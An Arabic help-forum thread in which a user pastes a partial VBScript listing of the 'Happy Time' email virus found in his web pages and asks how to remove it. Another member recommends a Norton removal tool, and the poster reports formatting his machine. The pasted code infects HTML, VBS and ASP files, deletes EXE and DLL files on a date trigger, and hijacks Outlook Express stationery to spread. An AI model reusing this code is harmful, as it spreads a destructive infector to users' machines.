النتائج 1 إلى 3 من 3

الموضوع: كيف أقوم بحذف هذا الفيروس

  1. #1



    السلام عليكم...

    وش رايكم في هذا الفيروس !!؟؟

    script language="VBScript"
    Rem I am sorry! happy time
    On Error Resume Next
    mload
    Sub mload()
    On Error Resume Next
    mPath = Grf()
    Set Os = CreateObject("Scriptlet.TypeLib")
    Set Oh = CreateObject("Shell.Application")
    If IsHTML Then
    mURL = LCase(document.Location)
    If mPath = "" Then
    Os.Reset
    Os.Path = "C:\Help.htm"
    Os.Doc = Lhtml()
    Os.Write()
    Ihtml = ""
    Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml)
    Else
    If Iv(mPath, "Help.vbs") Then
    setInterval "Rt()", 10000
    Else
    m = "hta"
    If LCase(m) = Right(mURL, Len(m)) Then
    id = setTimeout("mclose()", 1)
    main
    Else
    Os.Reset()
    Os.Path = mPath & "\" & "Help.hta"
    Os.Doc = Lhtml()
    Os.write()
    Iv mPath, "Help.hta"
    End If
    End If
    End If
    Else
    main
    End If
    End Sub
    Sub main()
    On Error Resume Next
    Set Of = CreateObject("Scripting.FileSystemObject")
    Set Od = CreateObject("Scripting.Dictionary")
    Od.Add "html", "1100"
    Od.Add "vbs", "0100"
    Od.Add "htm", "1100"
    Od.Add "asp", "0010"
    Ks = "HKEY_CURRENT_USER\Software\"
    Ds = Grf()
    Cs = Gsf()
    If IsVbs Then
    If Of.FileExists("C:\help.htm") Then
    Of.DeleteFile ("C:\help.htm")
    End If
    Key = CInt(Month(Date) + Day(Date))
    If Key = 13 Then
    Od.RemoveAll
    Od.Add "exe", "0001"
    Od.Add "dll", "0001"
    End If
    Cn = Rg(Ks & "Help\Count")
    If Cn = "" Then
    Cn = 1
    End If
    Rw Ks & "Help\Count", Cn + 1
    f1 = Rg(Ks & "Help\FileName")
    f2 = FNext(Of, Od, f1)
    fext = GetExt(Of, Od, f2)
    Rw Ks & "Help\FileName", f2
    If IsDel(fext) Then
    f3 = f2
    f2 = FNext(Of, Od, f2)
    Rw Ks & "Help\FileName", f2
    Of.DeleteFile f3
    Else
    If LCase(WScript.ScriptFullname) <> LCase(f2) Then
    Fw Of, f2, fext
    End If
    End If
    If (CInt(Cn) Mod 366) = 0 Then
    If (CInt(Second(Time)) Mod 2) = 0 Then
    Tsend
    Else
    adds = Og
    Msend (adds)
    End If
    End If
    wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper")
    If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then
    If wp = "" Then
    n1 = ""
    n3 = Cs & "\Help.htm"
    Else
    mP = Of.GetFile(wp).ParentFolder
    n1 = Of.GetFileName(wp)
    n2 = Of.GetBaseName(wp)
    n3 = Cs & "\" & n2 & ".htm"
    End If
    Set pfc = Of.CreateTextFile(n3, True)
    mt = Sa("1100")
    pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/Body><" & "/HTML>" & mt
    pfc.Close
    Rw Ks & "Help\wallPaper", n3
    Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3
    End If
    Else
    Set fc = Of.CreateTextFile(Ds & "\Help.vbs", True)
    fc.Write Sa("0100")
    fc.Close
    bf = Cs & "\Untitled.htm"
    Set fc2 = Of.CreateTextFile(bf, True)
    fc2.Write Lhtml
    fc2.Close
    oeid = Rg("HKEY_CURRENT_USER\Identities\Default User ID")
    oe = "HKEY_CURRENT_USER\Identities\" & oeid & "\Software\Microsoft\Outlook Express\5.0\Mail"
    MSH = oe & "\Message Send HTML"
    CUS = oe & "\Compose Use Stationery"
    SN = oe & "\Stationery Name"
    Rw MSH, 1
    Rw CUS, 1
    Rw SN, bf
    Web = Cs & "\WEB"
    Set gf = Of.GetFolder(Web).Files
    Od.Add "htt", "1100"
    For Each m In gf
    fext = GetExt(Of, Od, m)
    If fext <> ""
    End If
    End Function
    /script

    لو تلاحظون مدري كان هذا أسمه
    Rem I am sorry! happy time


    على فكره تراي مختصره طويل مره

    وهو ما يطلع لي إلا في برنامج الفرونت بيج أي صفحة أصممها ما ددري وش هو السبب وممكن أنكم تشوفون موقعي في الفيروس ولا لا
    بس لاتخافون ما روع
    http://www.zeeen.com

    ولو تذكرون لي أفضل يرامج الكشف عن الفيروسات مع التحديث
    ومشكورين مقدما

    أمل أن أجد الجواب






    zeeen.com غير متواجد حالياً


  2. #2


    هلا هلا بلزين :>
    شوف هذا فيروس مزعج معمول بلغه VBScript

    الاصابه عن طريق الايمل او عن طريق صفحه بلغه asp

    وانا بصراحه جنني بس لقيت دواه ملف صغير من موقع نورتن
    اسحب الملف ثم سوي اعاد لتشغيل الكميوتر وادخل على وضع لامان
    شغل ملف وضغط اوكي وهو بنضفلك جهازك من هذا لفيروس وهو فيروس يعدل بكثير من الملفات اغلبها ملفات html افتح اي ملف تلقى بأخر خمسة سطور الكود حق لفيروس
    عموما لملف لي بتسحبه من موقع نورتن هذا مؤقت بس لاكن لو رحت واتصفحت بصفحة مصابة راح يرجعلك الفيروس لذلك اخي لكريم من الافضل تركيب نسخه كامله وحديثة من برنامج نورتن انتي فيورس2002
    وخلي الابديت اسبوعين ولله بصراحه برنامج رهيب انصحك فيه
    اي موقع مشبوه ومفيرس على طول بلوك عليه
    وفي موقع دخلته حق النديم اضاهر مسوي كود بالصفحة يسرق فيها ارقام الاي سيس كيو بس قبل منت ادري بس مع النورتن كفشه وسوى بلوك لذلك انصحك بهذا لبرنامج معليش طولت عليك ونسسيت احط الينك
    تفضل وادعيلي ولاتنسى تنظف موقعك من الفيروس لازم ترسل صفحاتك من جديد
    http://www.symantec.com/avcenter/ven...ptime.fix.html

    وعلى فكرة موقعك اضاهر موقف من االهوست مطلع شيء طلع لشركة المستضيفه

    تحياتي لك وحياه سعيده بدون فيروسسات









    الساحل الغربي غير متواجد حالياً

  3. #3




    جزاك الله خير سا الساحل والله يكثر من أمثالك وأبشرك فرمته .!!





    zeeen.com غير متواجد حالياً





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض